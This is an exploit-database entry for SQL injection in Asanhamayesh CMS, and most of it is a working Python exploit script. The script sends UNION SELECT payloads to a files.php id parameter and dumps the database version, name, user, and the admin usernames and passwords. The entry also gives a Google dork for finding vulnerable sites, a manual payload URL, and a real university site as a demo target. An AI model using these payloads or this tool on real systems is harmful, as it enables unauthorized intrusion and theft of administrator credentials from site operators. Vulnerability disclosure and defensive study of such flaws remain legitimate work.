Asanhamayesh CMS | SQL Injection

2019.08.15
de D3tect0r (DE) de
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/python3 ########################################################################### # IN The Name OF God ########################################################################### # Title: Asanhamayesh CMS | SQL Injection # Date: 2019-07-23 # Google Dork: intext:طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس) # Exploit Author: Blue Tigers # Vendor Homepage: http://asanhamayesh.com # Tested on: GNU/Linux , Windows , FreeBsd , Android # CWE : CVE-89 ########################################################################### # We Are : D3tect0r (AMJ) & Invisible rabbit(Mahdis) & K0uR0sH3R ########################################################################### # Demo : http://www.med-sci.kau.ac.ir ########################################################################### import requests from bs4 import BeautifulSoup import sys print ('''\033[31m █████╗ ███████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗ █████╗ ██╗ ██╗███████╗███████╗██╗ ██╗ ██╔══██╗██╔════╝██╔══██╗████╗ ██║██║ ██║██╔══██╗████╗ ████║██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██║ ██║ ███████║███████╗███████║██╔██╗ ██║███████║███████║██╔████╔██║███████║ ╚████╔╝ █████╗ ███████╗███████║ ██╔══██║╚════██║██╔══██║██║╚██╗██║██╔══██║██╔══██║██║╚██╔╝██║██╔══██║ ╚██╔╝ ██╔══╝ ╚════██║██╔══██║ ██║ ██║███████║██║ ██║██║ ╚████║██║ ██║██║ ██║██║ ╚═╝ ██║██║ ██║ ██║ ███████╗███████║██║ ██║ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ \033[32m ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░▌ ▐░▌ ▀ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ \033[33m ▓█████ ▒██ ██▒ ██▓███ ██▓ ▒█████ ██▓▄▄▄█████▓ ▓█ ▀ ▒▒ █ █ ▒░▓██░ ██▒▓██▒ ▒██▒ ██▒▓██▒▓ ██▒ ▓▒ ▒███ ░░ █ ░▓██░ ██▓▒▒██░ ▒██░ ██▒▒██▒▒ ▓██░ ▒░ ▒▓█ ▄ ░ █ █ ▒ ▒██▄█▓▒ ▒▒██░ ▒██ ██░░██░░ ▓██▓ ░ ░▒████▒▒██▒ ▒██▒▒██▒ ░ ░░██████▒░ ████▓▒░░██░ ▒██▒ ░ ░░ ▒░ ░▒▒ ░ ░▓ ░▒▓▒░ ░ ░░ ▒░▓ ░░ ▒░▒░▒░ ░▓ ▒ ░░ ░ ░ ░░░ ░▒ ░░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ▒ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Created By Fri3nds Team ''') def print_usage(): print ("usage : python Exploit.py http://site.com/") if len(sys.argv) < 2: print_usage() sys.exit(1) url = sys.argv[1] vuln = "/fa/files.php?id=-555" ufv = url+vuln pname = "asanhamayesh.com" z = requests.get(ufv) if pname in z.text: print ("Connected!") print ("Enter 'Help' to Show Commands ") while True: opt = input ('\033[31m[root@asanhamayesh Exploit]# ') if opt == 'help' : print (''' version Show version of database database Show Databasee name userdb Show Database user usernames Show Usernames of CMS passwords Show Passwords of CMS userpass Show Usernames with Passwords [Ex:User:password] dontwork If this Exploit failed to exploit the target, enter this command exit Exit From Exploit ''') if opt == 'version': try: payload = "+union+select+1,2,version(),4,5,6--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'class':'col-md-9'}) for i in data[1]: print ('\033[92m' ,i) except: payload = "+union+select+1,2,version(),4,5,6--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'style':''}) for i in data[1]: print('\033[92m',i) elif opt == 'database': try: payload = "+union+select+1,2,database(),4,5,6--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'class':'col-md-9'}) for i in data[1]: print ('\033[92m',i) except: payload = "+union+select+1,2,database(),4,5,6--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'style':''}) for i in data[1]: print('\033[92m',i) elif opt == 'userdb': try: payload = "+union+select+1,2,user(),4,5,6--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'class':'col-md-9'}) for i in data[1]: print ('\033[92m',i) except: payload = "+union+select+1,2,user(),4,5,6--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'style':''}) for i in data[1]: print('\033[92m',i) elif opt == 'usernames': try: payload = "+union+select+1,2,unhex(hex(group_concat(username))),4,5,6+from+sub_admins--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'class':'col-md-9'}) for i in data[1]: print('\033[92m',i) except: payload = "+union+select+1,2,unhex(hex(group_concat(username))),4,5,6+from+sub_admins--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'style':''}) for i in data[1]: print('\033[92m',i) elif opt == 'passwords': try: payload = "+union+select+1,2,unhex(hex(group_concat(password))),4,5,6+from+sub_admins--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'class':'col-md-9'}) for i in data[1]: print (i) except: payload = "+union+select+1,2,unhex(hex(group_concat(password))),4,5,6+from+sub_admins--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'style':''}) for i in data[1]: print('\033[92m',i) elif opt == 'userpass': try: payload = "+union+select+1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6+from+sub_admins--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'class':'col-md-9'}) for i in data[1]: print('\033[92m',i) except: payload = "+union+select+1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6+from+sub_admins--+" up = (ufv+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('td',attrs={'style':''}) for i in data[1]: print('\033[92m',i) elif opt == 'dontwork': print ('''\033[92m Well you can manually infiltrate your target To do this, place the bottom URL in front of the site address and manually inject the commands. /fa/files.php?id=-555 In all sites the number of columns is equal to 6 and the vulnerable column is number 3. EX: site.com/fa/files.php?id=-555+union+select+1,2,unhex(hex(group_concat(username,0x3a,password))),4,5,6+from+sub_admins--+ ''') elif opt == 'exit': sys.exit() else: print ("EXP:",opt,"Command Not Found") else: print ("Exploit is not Support From This Target") sys.exit()

References:

http://www.med-sci.kau.ac.ir


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top